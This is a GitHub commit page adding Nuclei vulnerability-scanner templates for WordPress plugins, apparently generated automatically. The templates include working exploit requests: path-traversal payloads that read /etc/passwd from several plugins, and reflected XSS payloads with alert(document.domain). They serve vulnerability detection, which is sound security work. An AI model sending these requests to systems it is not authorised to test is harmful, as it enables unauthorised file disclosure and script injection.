Skip to content

Commit

Permalink
20241215
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 15, 2024
1 parent 62bad0f commit dc2bed7
Show file tree
Hide file tree
Showing 99 changed files with 5,526 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241214
20241215
97 changes: 97 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

59 changes: 59 additions & 0 deletions poc/auth/ider-login.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: ider-login-77ccffccfac1bb6eac46823913cc705c

info:
name: >
IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/ider-login/"
google-query: inurl:"/wp-content/plugins/ider-login/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,ider-login,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "ider-login"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.1')
27 changes: 27 additions & 0 deletions poc/cve/CVE-2011-1669-2041.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: CVE-2011-1669

info:
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119
tags: cve,cve2011,wordpress,wp-plugin,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
30 changes: 30 additions & 0 deletions poc/cve/CVE-2011-5179-2110.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2011-5179

info:
name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
30 changes: 30 additions & 0 deletions poc/cve/CVE-2012-4768-2206.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2012-4768

info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
tags: cve,cve2012,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
30 changes: 30 additions & 0 deletions poc/cve/CVE-2013-4625-2266.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2013-4625

info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625


requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
34 changes: 34 additions & 0 deletions poc/cve/CVE-2015-5471-2557.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
id: CVE-2015-5471
info:
name: Swim Team <= v1.44.10777 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.
reference:
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
- http://www.vapid.dhs.org/advisory.php?v=134
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
- http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
remediation: Upgrade to Swim Team version 1.45 or newer.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2015-5471
cwe-id: CWE-22
metadata:
google-query: inurl:"/wp-content/plugins/wp-swimteam"
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

# Enhanced by cs on 2022/02/25
30 changes: 30 additions & 0 deletions poc/cve/CVE-2016-1000129-2655.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2016-1000129
info:
name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000129
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
35 changes: 35 additions & 0 deletions poc/cve/CVE-2016-1000133-2675.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: CVE-2016-1000133

info:
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000133
cwe-id: CWE-79

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
35 changes: 35 additions & 0 deletions poc/cve/CVE-2016-1000140-2703.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: CVE-2016-1000140

info:
name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000140
cwe-id: CWE-79
description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9"

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
35 changes: 35 additions & 0 deletions poc/cve/CVE-2016-1000141-2707.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: CVE-2016-1000141
info:
name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.
remediation: Upgrade to version 2.0 or higher.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=358
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000141
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/03/24
34 changes: 34 additions & 0 deletions poc/cve/CVE-2016-10956-2762.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
id: CVE-2016-10956

info:
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo,0x240x23elu
severity: high
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
reference:
- https://cxsecurity.com/issue/WLB-2016080220
- https://wpvulndb.com/vulnerabilities/8609
- https://wordpress.org/plugins/mail-masta/#developers
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-10956
cwe-id: CWE-20
tags: cve,cve2016,wordpress,wp-plugin,lfi,mail

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"

matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
- 500
Loading

0 comments on commit dc2bed7

Please sign in to comment.